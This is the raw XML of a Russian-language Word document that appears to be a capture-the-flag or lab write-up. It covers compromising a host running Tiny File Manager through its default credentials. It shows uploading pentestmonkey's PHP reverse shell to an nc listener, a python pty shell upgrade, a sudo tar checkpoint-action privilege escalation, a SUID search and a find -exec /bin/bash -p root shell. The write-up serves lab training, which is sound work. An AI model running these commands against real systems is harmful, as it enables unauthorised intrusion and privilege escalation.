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4E71" w14:textId="53E56CB6" w:rsidR="00233BE7" w:rsidRDefault="00233B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3BE7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Tiny</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23885EE1" w14:textId="004ADE05" w:rsidR="00233BE7" w:rsidRDefault="00233B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</w:p>
    <w:p w14:paraId="53341E50" w14:textId="025339F6" w:rsidR="00233BE7" w:rsidRDefault="00233B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4ABFBA" wp14:editId="0C667AF7">
            <wp:extent cx="5940425" cy="3025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41F2" w14:textId="68E2136E" w:rsidR="00233BE7" w:rsidRPr="00917770" w:rsidRDefault="00233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Подсказка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енумерацию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B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3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45E4BE4D" w14:textId="4C4E8379" w:rsidR="00233BE7" w:rsidRDefault="00233B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687103" wp14:editId="200887EC">
            <wp:extent cx="5940425" cy="114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9DE2" w14:textId="463FFC41" w:rsidR="00917770" w:rsidRDefault="009177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C944E3" wp14:editId="0FAEF6D5">
            <wp:extent cx="5940425" cy="3611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E7A4" w14:textId="4C94211D" w:rsidR="00917770" w:rsidRDefault="00917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– натыкаемся на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tiny</w:t>
      </w:r>
      <w:r w:rsidRPr="009177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177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9177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дефолтными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645B9" w14:textId="67E22E36" w:rsidR="00917770" w:rsidRPr="00917770" w:rsidRDefault="0091777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1777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1777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91777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91777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1777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1777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1777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prasathmani</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="0091777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1777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tinyfilemanager</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00917770">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  --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177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gramEnd"/>
      <w:r w:rsidRPr="00917770">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>@123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18534DBA" w14:textId="6B13C7E6" w:rsidR="00917770" w:rsidRDefault="009177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F3083" wp14:editId="4C34CB95">
            <wp:extent cx="5857875" cy="658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AD2D" w14:textId="23A00224" w:rsidR="00917770" w:rsidRDefault="009177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 shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7EDB05" w14:textId="6C652F17" w:rsidR="00917770" w:rsidRDefault="0091777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AD35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https://github.com/pentestmonkey/php-reverse-shell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and port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nvlp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1234)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CB2E4" w14:textId="6D2E7533" w:rsidR="00917770" w:rsidRDefault="009177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B4C9DD" wp14:editId="1678B7EB">
            <wp:extent cx="5116945" cy="315057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159" cy="31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C5E" w14:textId="2568E179" w:rsidR="00917770" w:rsidRPr="003F2875" w:rsidRDefault="003F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 файл и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>RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D443DB4" w14:textId="439EA0D2" w:rsidR="00917770" w:rsidRDefault="009177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BD357" wp14:editId="1E66EA12">
            <wp:extent cx="5940425" cy="2783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652B" w14:textId="773955DD" w:rsidR="003F2875" w:rsidRDefault="003F2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-l (</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00AD35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https://gtfobins.github.io/gtfobins/tar/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1795FC" w14:textId="72BBAFE3" w:rsidR="003F2875" w:rsidRPr="003F2875" w:rsidRDefault="003F28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287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F2875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u john tar -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003F2875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3F2875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE27D0" w14:textId="19F02C50" w:rsidR="00917770" w:rsidRDefault="003F2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D57333" wp14:editId="5999E6F2">
            <wp:extent cx="4608945" cy="21731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735" cy="2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68A" w14:textId="3C709E67" w:rsidR="005D782C" w:rsidRPr="005D782C" w:rsidRDefault="005D78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78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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1D4FF9" w14:textId="3A511519" w:rsidR="003F2875" w:rsidRDefault="003F2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EA1568" wp14:editId="52CDC024">
            <wp:extent cx="5940425" cy="1049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1551" w14:textId="33ECAE86" w:rsidR="005D782C" w:rsidRDefault="003F28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875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003F2875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pty;pty</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003F2875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003F2875">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D78A36" w14:textId="5EC7BC20" w:rsidR="003F2875" w:rsidRDefault="003F2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0B3BB7" wp14:editId="3DFE99BF">
            <wp:extent cx="393382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13C8" w14:textId="4336E228" w:rsid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8EF6F1" wp14:editId="26A4504C">
            <wp:extent cx="30956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9CBE" w14:textId="5D62115E" w:rsid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82C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</w:p>
    <w:p w14:paraId="46F3185C" w14:textId="6F826CF7" w:rsid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82C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>find / -perm -g=s -o -perm -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D782C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4000 !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005D782C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -type l -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D782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5D782C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6 -exec ls -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D782C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5D782C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {} \; 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D156140" w14:textId="1641362B" w:rsidR="005D782C" w:rsidRP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910767" wp14:editId="3EE07180">
            <wp:extent cx="4701309" cy="2951447"/>
            <wp:effectExtent l="0" t="0" r="444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833" cy="29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596A" w14:textId="3917C8E7" w:rsid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782C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5D782C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>find . -exec /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D782C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5D782C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D782C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>\;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6083272C" w14:textId="431E12CA" w:rsid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D61977" wp14:editId="565983B1">
            <wp:extent cx="5940425" cy="16713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A207" w14:textId="62049CFD" w:rsid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0779B6" wp14:editId="47D53939">
            <wp:extent cx="4048125" cy="11715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699A" w14:textId="77777777" w:rsidR="005D782C" w:rsidRPr="005D782C" w:rsidRDefault="005D78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D782C" w:rsidRPr="005D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7"/>
    <w:rsid w:val="00233BE7"/>
    <w:rsid w:val="003F2875"/>
    <w:rsid w:val="005D782C"/>
    <w:rsid w:val="009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6102"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4D63F4CC-E8E7-4B82-B941-B5F11A24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7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7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rasathmani/tinyfilemanager" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/tar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github.com/pentestmonkey/php-reverse-shel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bakassarina bakassarina</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>bakassarina bakassarina</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-07T17:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-07T18:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>